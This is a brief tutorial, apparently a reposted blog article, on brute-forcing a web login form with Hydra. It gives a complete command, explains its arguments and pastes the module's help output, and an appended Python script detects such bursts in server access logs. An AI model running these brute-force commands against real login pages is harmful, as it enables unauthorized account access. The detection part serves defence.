程序员文章站 2024-01-19 12:15:22
This covers POST-type login forms.

[root@fedora ~]# hydra -f -l sincoder -P /root/1.txt -V -s 9900 http-post-form "/admin/index.php?action=login:user=^USER^&pw=^PASS^:<title>登录</title>"


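The part to look at is the argument at the end.

/index.php ... this is the login URL.

Next comes the POST data, with the username and password replaced by ^USER^ and ^PASS^.

Last is the string that appears in the response when the login fails.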

[root@fedora ~]# hydra -U http-form
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-11-25 19:25:02

Help for module http-form:

Module http-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with usernames and passwords being replaced in the "^USER^" and "^PASS^"
 placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter!
The following parameters are optional:
 C=/page/uri     to define a different page to gather initial cookies from
 H=My-Hdr: foo   to send a user defined HTTP header with each request

 "/login:user=^USER&pass=^PASS:failed:H=Authorization: Basic dT1w:H=X-Foo: Bar"

[root@fedora ~]#
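
On the server side, a run like the one above shows up in the access log as a burst of POSTs to the login URL from one client. The following is an added example, not part of the original post, that flags such bursts; the combined log format, the sample lines, the addresses and the 5-per-60-seconds threshold are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/admin/index.php?action=login"  # login URL from the command above
WINDOW = timedelta(seconds=60)                 # assumed detection window
MAX_POSTS = 5                                  # assumed per-client limit inside the window

# Assumed log layout: Apache/nginx "combined" access log.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)

# Constructed sample: one client posting once per second, one ordinary admin.
SAMPLE_LOG = "\n".join(
    [f'203.0.113.7 - - [25/Nov/2012:19:25:{s:02d} +0800] "POST {LOGIN_PATH} HTTP/1.1" 200 1432'
     for s in range(2, 10)]
    + [f'198.51.100.20 - - [25/Nov/2012:19:20:11 +0800] "POST {LOGIN_PATH} HTTP/1.1" 200 1432',
       f'198.51.100.20 - - [25/Nov/2012:19:24:40 +0800] "POST {LOGIN_PATH} HTTP/1.1" 302 0',
       '198.51.100.20 - - [25/Nov/2012:19:24:41 +0800] "GET /admin/index.php HTTP/1.1" 200 5120']
)

def parse(line):
    """Return (ip, timestamp, method, path) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"]

def find_bruteforce(log_text, max_posts=MAX_POSTS, window=WINDOW):
    """Map client IP -> peak number of login POSTs seen inside one window."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    flagged = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        # Count every POST: failure here is signalled by response text, not status code.
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:   # drop attempts older than the window
            q.popleft()
        if len(q) > max_posts:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged
```

Calling `find_bruteforce(SAMPLE_LOG)` reports only the client that posted eight times in seven seconds; the second client's two logins minutes apart stay under the limit.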